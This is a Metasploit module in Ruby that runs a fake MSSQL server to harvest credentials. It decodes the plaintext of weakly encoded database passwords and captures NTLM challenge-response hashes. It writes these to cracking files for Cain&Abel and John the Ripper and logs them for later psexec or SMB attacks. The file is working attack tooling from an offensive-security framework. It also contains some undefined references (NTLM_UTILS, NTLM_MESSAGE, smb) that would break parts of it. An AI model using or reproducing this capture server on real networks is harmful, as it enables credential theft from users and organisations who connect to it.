## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/message' require 'rex/proto/ntlm/crypt' NTLM_CONST = Rex::Proto::NTLM::Constants NTLM_CRYPT = Rex::Proto::NTLM::Crypt MESSAGE = Rex::Proto::NTLM::Message class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Exploit::Remote::SMB::Server include Msf::Auxiliary::Report class Constants TDS_MSG_RESPONSE = 0x04 TDS_MSG_LOGIN = 0x10 TDS_MSG_SSPI = 0x11 TDS_MSG_PRELOGIN = 0x12 TDS_TOKEN_ERROR = 0xAA TDS_TOKEN_AUTH = 0xED end def initialize super( 'Name' => 'Authentication Capture: MSSQL', 'Description' => %q{ This module provides a fake MSSQL service that is designed to capture authentication credentials. The modules supports both the weak encoded database logins as well as Windows logins (NTLM). }, 'Author' => 'Patrik Karlsson ', 'License' => MSF_LICENSE, 'Actions' => [ [ 'Capture' ] ], 'PassiveActions' => [ 'Capture' ], 'DefaultAction' => 'Capture' ) register_options( [ OptPort.new('SRVPORT', [ true, "The local port to listen on.", 1433 ]), OptString.new('CAINPWFILE', [ false, "The local filename to store the hashes in Cain&Abel format", nil ]), OptString.new('JOHNPWFILE', [ false, "The prefix to the local filename to store the hashes in JOHN format", nil ]), OptString.new('CHALLENGE', [ true, "The 8 byte challenge ", "1122334455667788" ]) ], self.class) register_advanced_options( [ OptBool.new("SMB_EXTENDED_SECURITY", [ true, "Use smb extended security negociation, when set client will use ntlmssp, if not then client will use classic lanman authentification", false ]), OptString.new('DOMAIN_NAME', [ true, "The domain name used during smb exchange with smb extended security set ", "anonymous" ]) ], self.class) end def setup super @state = {} end def run @s_smb_esn = datastore['SMB_EXTENDED_SECURITY'] @domain_name = datastore['DOMAIN_NAME'] if datastore['CHALLENGE'].to_s =~ /^([a-fA-F0-9]{16})$/ @challenge = [ datastore['CHALLENGE'] ].pack("H*") else print_error("CHALLENGE syntax must match 1122334455667788") return end # those variables will prevent to spam the screen with identical hashes (works only with ntlmv1) @previous_lm_hash="none" @previous_ntlm_hash="none" print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...") exploit() end def on_client_connect(c) @state[c] = { :name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :user => nil, :pass => nil } end # decodes a mssql password def mssql_tds_decrypt(pass) Rex::Text.to_ascii(pass.unpack("C*").map {|c| ((( c ^ 0xa5 ) & 0x0F) << 4) | ((( c ^ 0xa5 ) & 0xF0 ) >> 4) }.pack("C*")) end # doesn't do any real parsing, slices of the data def mssql_parse_prelogin(data, info) status = data.slice!(0,1).unpack('C')[0] len = data.slice!(0,2).unpack('n')[0] # just slice away the rest of the packet data.slice!(0, len - 4) return [] end # parses a login packet sent to the server def mssql_parse_login(data, info) status = data.slice!(0,1).unpack('C')[0] len = data.slice!(0,2).unpack('n')[0] if len > data.length + 4 info[:errors] << "Login packet to short" return end # slice of: # * channel, packetno, window # * login header # * client name lengt & offset login_hdr = data.slice!(0,4 + 36 + 4) username_offset = data.slice!(0,2).unpack('v')[0] username_length = data.slice!(0,2).unpack('v')[0] pw_offset = data.slice!(0,2).unpack('v')[0] pw_length = data.slice!(0,2).unpack('v')[0] appname_offset = data.slice!(0,2).unpack('v')[0] appname_length = data.slice!(0,2).unpack('v')[0] srvname_offset = data.slice!(0,2).unpack('v')[0] srvname_length = data.slice!(0,2).unpack('v')[0] if username_offset > 0 and pw_offset > 0 offset = username_offset - 56 info[:user] = Rex::Text::to_ascii(data[offset..(offset + username_length * 2)]) offset = pw_offset - 56 if pw_length == 0 info[:pass] = "" else info[:pass] = mssql_tds_decrypt(data[offset..(offset + pw_length * 2)].unpack("A*")[0]) end offset = srvname_offset - 56 info[:srvname] = Rex::Text::to_ascii(data[offset..(offset + srvname_length * 2)]) else info[:isntlm?]= true end # slice of remaining packet data.slice!(0, data.length) info end # copied and slightly modified from http_ntlm html_get_hash def mssql_get_hash(arg = {}) ntlm_ver = arg[:ntlm_ver] if ntlm_ver == NTLM_CONST::NTLM_V1_RESPONSE or ntlm_ver == NTLM_CONST::NTLM_2_SESSION_RESPONSE lm_hash = arg[:lm_hash] nt_hash = arg[:nt_hash] else lm_hash = arg[:lm_hash] nt_hash = arg[:nt_hash] lm_cli_challenge = arg[:lm_cli_challenge] nt_cli_challenge = arg[:nt_cli_challenge] end domain = arg[:domain] user = arg[:user] host = arg[:host] ip = arg[:ip] unless @previous_lm_hash == lm_hash and @previous_ntlm_hash == nt_hash then @previous_lm_hash = lm_hash @previous_ntlm_hash = nt_hash # Check if we have default values (empty pwd, null hashes, ...) and adjust the on-screen messages correctly case ntlm_ver when NTLM_CONST::NTLM_V1_RESPONSE if NTLM_CRYPT::is_hash_from_empty_pwd?({:hash => [nt_hash].pack("H*"),:srv_challenge => @challenge, :ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE, :type => 'ntlm' }) print_status("NLMv1 Hash correspond to an empty password, ignoring ... ") return end if (lm_hash == nt_hash or lm_hash == "" or lm_hash =~ /^0*$/ ) then lm_hash_message = "Disabled" elsif NTLM_CRYPT::is_hash_from_empty_pwd?({:hash => [lm_hash].pack("H*"),:srv_challenge => @challenge, :ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE, :type => 'lm' }) lm_hash_message = "Disabled (from empty password)" else lm_hash_message = lm_hash lm_chall_message = lm_cli_challenge end when NTLM_CONST::NTLM_V2_RESPONSE if NTLM_CRYPT::is_hash_from_empty_pwd?({:hash => [nt_hash].pack("H*"),:srv_challenge => @challenge, :cli_challenge => [nt_cli_challenge].pack("H*"), :user => Rex::Text::to_ascii(user), :domain => Rex::Text::to_ascii(domain), :ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE, :type => 'ntlm' }) print_status("NTLMv2 Hash correspond to an empty password, ignoring ... ") return end if lm_hash == '0' * 32 and lm_cli_challenge == '0' * 16 lm_hash_message = "Disabled" lm_chall_message = 'Disabled' elsif NTLM_CRYPT::is_hash_from_empty_pwd?({:hash => [lm_hash].pack("H*"),:srv_challenge => @challenge, :cli_challenge => [lm_cli_challenge].pack("H*"), :user => Rex::Text::to_ascii(user), :domain => Rex::Text::to_ascii(domain), :ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE, :type => 'lm' }) lm_hash_message = "Disabled (from empty password)" lm_chall_message = 'Disabled' else lm_hash_message = lm_hash lm_chall_message = lm_cli_challenge end when NTLM_CONST::NTLM_2_SESSION_RESPONSE if NTLM_CRYPT::is_hash_from_empty_pwd?({:hash => [nt_hash].pack("H*"),:srv_challenge => @challenge, :cli_challenge => [lm_hash].pack("H*")[0,8], :ntlm_ver => NTLM_CONST::NTLM_2_SESSION_RESPONSE, :type => 'ntlm' }) print_status("NTLM2_session Hash correspond to an empty password, ignoring ... ") return end lm_hash_message = lm_hash lm_chall_message = lm_cli_challenge end # Display messages domain = Rex::Text::to_ascii(domain) user = Rex::Text::to_ascii(user) capturedtime = Time.now.to_s case ntlm_ver when NTLM_CONST::NTLM_V1_RESPONSE smb_db_type_hash = "smb_netv1_hash" capturelogmessage = "#{capturedtime}\nNTLMv1 Response Captured from #{host} \n" + "DOMAIN: #{domain} USER: #{user} \n" + "LMHASH:#{lm_hash_message ? lm_hash_message : ""} \nNTHASH:#{nt_hash ? nt_hash : ""}\n" when NTLM_CONST::NTLM_V2_RESPONSE smb_db_type_hash = "smb_netv2_hash" capturelogmessage = "#{capturedtime}\nNTLMv2 Response Captured from #{host} \n" + "DOMAIN: #{domain} USER: #{user} \n" + "LMHASH:#{lm_hash_message ? lm_hash_message : ""} " + "LM_CLIENT_CHALLENGE:#{lm_chall_message ? lm_chall_message : ""}\n" + "NTHASH:#{nt_hash ? nt_hash : ""} " + "NT_CLIENT_CHALLENGE:#{nt_cli_challenge ? nt_cli_challenge : ""}\n" when NTLM_CONST::NTLM_2_SESSION_RESPONSE #we can consider those as netv1 has they have the same size and i cracked the same way by cain/jtr #also 'real' netv1 is almost never seen nowadays except with smbmount or msf server capture smb_db_type_hash = "smb_netv1_hash" capturelogmessage = "#{capturedtime}\nNTLM2_SESSION Response Captured from #{host} \n" + "DOMAIN: #{domain} USER: #{user} \n" + "NTHASH:#{nt_hash ? nt_hash : ""}\n" + "NT_CLIENT_CHALLENGE:#{lm_hash_message ? lm_hash_message[0,16] : ""} \n" else # should not happen return end print_status(capturelogmessage) # DB reporting # Rem : one report it as a smb_challenge on port 445 has breaking those hashes # will be mainly use for psexec / smb related exploit report_auth_info( :host => arg[:ip], :port => 445, :sname => 'smb_client', :user => user, :pass => domain + ":" + ( lm_hash + lm_cli_challenge.to_s ? lm_hash + lm_cli_challenge.to_s : "00" * 24 ) + ":" + ( nt_hash + nt_cli_challenge.to_s ? nt_hash + nt_cli_challenge.to_s : "00" * 24 ) + ":" + datastore['CHALLENGE'].to_s, :type => smb_db_type_hash, :proof => "DOMAIN=#{domain}", :source_type => "captured", :active => true ) #if(datastore['LOGFILE']) # File.open(datastore['LOGFILE'], "ab") {|fd| fd.puts(capturelogmessage + "\n")} #end if(datastore['CAINPWFILE'] and user) if ntlm_ver == NTLM_CONST::NTLM_V1_RESPONSE or ntlm_ver == NTLM_CONST::NTLM_2_SESSION_RESPONSE fd = File.open(datastore['CAINPWFILE'], "ab") fd.puts( [ user, domain ? domain : "NULL", @challenge.unpack("H*")[0], lm_hash ? lm_hash : "0" * 48, nt_hash ? nt_hash : "0" * 48 ].join(":").gsub(/\n/, "\\n") ) fd.close end end if(datastore['JOHNPWFILE'] and user) case ntlm_ver when NTLM_CONST::NTLM_V1_RESPONSE, NTLM_CONST::NTLM_2_SESSION_RESPONSE fd = File.open(datastore['JOHNPWFILE'] + '_netntlm', "ab") fd.puts( [ user,"", domain ? domain : "NULL", lm_hash ? lm_hash : "0" * 48, nt_hash ? nt_hash : "0" * 48, @challenge.unpack("H*")[0] ].join(":").gsub(/\n/, "\\n") ) fd.close when NTLM_CONST::NTLM_V2_RESPONSE #lmv2 fd = File.open(datastore['JOHNPWFILE'] + '_netlmv2', "ab") fd.puts( [ user,"", domain ? domain : "NULL", @challenge.unpack("H*")[0], lm_hash ? lm_hash : "0" * 32, lm_cli_challenge ? lm_cli_challenge : "0" * 16 ].join(":").gsub(/\n/, "\\n") ) fd.close #ntlmv2 fd = File.open(datastore['JOHNPWFILE'] + '_netntlmv2' , "ab") fd.puts( [ user,"", domain ? domain : "NULL", @challenge.unpack("H*")[0], nt_hash ? nt_hash : "0" * 32, nt_cli_challenge ? nt_cli_challenge : "0" * 160 ].join(":").gsub(/\n/, "\\n") ) fd.close end end end end def mssql_parse_ntlmsspi(data, info) start = data.index('NTLMSSP') if start data.slice!(0,start) else print_error("Failed to find NTLMSSP authentication blob") return end ntlm_message = NTLM_MESSAGE::parse(data) case ntlm_message when NTLM_MESSAGE::Type3 lm_len = ntlm_message.lm_response.length # Always 24 nt_len = ntlm_message.ntlm_response.length if nt_len == 24 #lmv1/ntlmv1 or ntlm2_session arg = { :ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE, :lm_hash => ntlm_message.lm_response.unpack('H*')[0], :nt_hash => ntlm_message.ntlm_response.unpack('H*')[0] } if @s_ntlm_esn && arg[:lm_hash][16,32] == '0' * 32 arg[:ntlm_ver] = NTLM_CONST::NTLM_2_SESSION_RESPONSE end # if the length of the ntlm response is not 24 then it will be bigger and represent # a ntlmv2 response elsif nt_len > 24 #lmv2/ntlmv2 arg = { :ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE, :lm_hash => ntlm_message.lm_response[0, 16].unpack('H*')[0], :lm_cli_challenge => ntlm_message.lm_response[16, 8].unpack('H*')[0], :nt_hash => ntlm_message.ntlm_response[0, 16].unpack('H*')[0], :nt_cli_challenge => ntlm_message.ntlm_response[16, nt_len - 16].unpack('H*')[0] } elsif nt_len == 0 print_status("Empty hash from #{smb[:name]} captured, ignoring ... ") return else print_status("Unknown hash type from #{smb[:name]}, ignoring ...") return end arg[:user] = ntlm_message.user arg[:domain] = ntlm_message.domain arg[:ip] = info[:ip] arg[:host] = info[:ip] begin mssql_get_hash(arg) rescue ::Exception => e print_error("Error processing Hash from #{smb[:name]} : #{e.class} #{e} #{e.backtrace}") end else info[:errors] << "Unsupported NTLM authentication message type" end # slice of remainder data.slice!(0,data.length) end # # Parse individual tokens from a TDS reply # def mssql_parse_reply(data, info) info[:errors] = [] return if not data until data.empty? or ( info[:errors] and not info[:errors].empty? ) token = data.slice!(0,1).unpack('C')[0] case token when Constants::TDS_MSG_LOGIN mssql_parse_login(data, info) info[:type] = Constants::TDS_MSG_LOGIN when Constants::TDS_MSG_PRELOGIN mssql_parse_prelogin(data, info) info[:type] = Constants::TDS_MSG_PRELOGIN when Constants::TDS_MSG_SSPI mssql_parse_ntlmsspi(data, info) info[:type] = Constants::TDS_MSG_SSPI else info[:errors] << "unsupported token: #{token}" end end info end # Sends an error message to the MSSQL client def mssql_send_error(c, msg) data = [ Constants::TDS_MSG_RESPONSE, 1, # status 0x0020 + msg.length * 2, 0x0037, # channel: 55 0x01, # packet no: 1 0x00, # window: 0 Constants::TDS_TOKEN_ERROR, 0x000C + msg.length * 2, 18456, # SQL Error number 1, # state: 1 14, # severity: 14 msg.length, # error msg length 0, Rex::Text::to_unicode(msg), 0, # server name length 0, # process name length 0, # line number "fd0200000000000000" ].pack("CCnnCCCvVCCCCA*CCnH*") c.put data end def mssql_send_ntlm_challenge(c, info) win_domain = Rex::Text.to_unicode(@domain_name.upcase) win_name = Rex::Text.to_unicode(@domain_name.upcase) dns_domain = Rex::Text.to_unicode(@domain_name.downcase) dns_name = Rex::Text.to_unicode(@domain_name.downcase) if @s_ntlm_esn sb_flag = 0xe28a8215 # ntlm2 else sb_flag = 0xe2828215 #no ntlm2 end securityblob = NTLM_UTILS::make_ntlmssp_blob_chall( win_domain, win_name, dns_domain, dns_name, @challenge, sb_flag) data = [ Constants::TDS_MSG_RESPONSE, 1, # status 11 + securityblob.length, # length 0x0000, # channel 0x01, # packetno 0x00, # window Constants::TDS_TOKEN_AUTH, # token: authentication securityblob.length, # length securityblob ].pack("CCnnCCCvA*") c.put data end def mssql_send_prelogin_response(c, info) data = [ Constants::TDS_MSG_RESPONSE, 1, # status 0x002b, # length "0000010000001a00060100200001020021000103002200000400220001ff0a3206510000020000" ].pack("CCnH*") c.put data end def on_client_data(c) info = {:errors => [], :ip => @state[c][:ip]} data = c.get_once return if not data info = mssql_parse_reply(data, info) if(info[:errors] and not info[:errors].empty?) print_error("#{info[:errors]}") c.close return end # no errors, and the packet was a prelogin # if we just close the connection here, it seems that the client: # SQL Server Management Studio 2008R2, falls back to the weaker encoded # password authentication. case info[:type] when Constants::TDS_MSG_PRELOGIN mssql_send_prelogin_response(c, info) when Constants::TDS_MSG_SSPI mssql_send_error(c, "Error: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.") when Constants::TDS_MSG_LOGIN if info[:isntlm?] == true mssql_send_ntlm_challenge(c, info) elsif info[:user] and info[:pass] report_auth_info( :host => @state[c][:ip], :port => datastore['SRVPORT'], :sname => 'mssql_client', :user => info[:user], :pass => info[:pass], :source_type => "captured", :active => true ) print_status("MSSQL LOGIN #{@state[c][:name]} #{info[:user]} / #{info[:pass]}") mssql_send_error(c, "Login failed for user '#{info[:user]}'.") c.close end end end def on_client_close(c) @state.delete(c) end end